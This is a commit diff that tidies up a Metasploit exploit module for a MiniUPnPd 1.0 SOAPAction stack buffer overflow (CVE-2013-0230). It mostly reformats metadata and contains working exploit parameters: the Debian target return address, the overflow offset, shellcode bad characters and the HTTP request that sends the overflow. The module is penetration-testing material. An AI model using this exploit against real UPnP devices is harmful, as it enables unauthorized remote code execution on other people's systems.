Minor cleanup for miniupnpd_soap_bof

jvazquez-r7 · jvazquez-r7 · commit 3111013991e6 · 2013-06-04T08:53:52.000-05:00
diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
@@ -9,41 +9,56 @@
 
 class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpClient
-  Rank = NormalRanking
+	Rank = NormalRanking
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'						=>	'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
-			'Description'		 =>
-				%q{
-					This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability present
-					in the SOAPAction HTTP header.
-				},
-			'Author'					=> [ 'Dejan Lukan' ],
-			'License'				 => MSF_LICENSE,
-			'DefaultOptions'	=> { 'EXITFUNC' => 'process', },
+			'Name'           => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
+			'Description'    => %q{
+					This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
+				present in the SOAPAction HTTP header handling.
+			},
+			'Author'         =>
+				[
+					'hdm', # Vulnerability discovery
+					'Dejan Lukan' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'DefaultOptions' => { 'EXITFUNC' => 'process', },
 			# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
 			# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
 			# of the program is never reached)
-			'Payload'				 => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true },
-			'Platform'				=> 'linux',
-			'References'			=> [
-				[ 'CVE', '2013-0230' ],
-				[ 'OSVDB', '89624' ],
-			],
-			'Targets'				 =>
+			'Payload'        =>
+				{
+					'Space' => 2060,
+					'BadChars' => "\x00\x22",
+					'DisableNops' => true
+				},
+			'Platform'       => 'linux',
+			'References'     =>
+				[
+					[ 'CVE', '2013-0230' ],
+					[ 'OSVDB', '89624' ],
+					[ 'BID', '57608' ],
+					[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
+				],
+			'Targets'        =>
 				[
-					['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
+					[ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
+						{
+							'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
+							'Offset' => 2123
+						}
+					],
 				],
-			'DefaultTarget'	 => 0,
-			'Privileged'			=> false,
-			'DisclosureDate'	 => 'Mar 27 2013',
-			))
+			'DefaultTarget'  => 0,
+			'Privileged'     => false,
+			'DisclosureDate' => 'Mar 27 2013',
+		))
 
-			register_options(
-			[
-				Opt::RPORT(5555),
-			], self.class)
+		register_options([
+			Opt::RPORT(5555),
+		], self.class)
 	end
 
 	def exploit
@@ -92,14 +107,13 @@ def exploit
 			"</SOAP-ENV:Body>\r\n" +
 			"</SOAP-ENV:Envelope>\r\n"
 
-
 		#
 		# Build and send the HTTP request
 		#
 		print_status("Sending exploit to victim #{target.name} at ...")
 		send_request_cgi({
 			'method'	=> 'POST',
-			'uri'		 => target_uri.path,
+			'uri'		 => "/",
 			'headers' => {
 				'SOAPAction' => sploit,
 			},
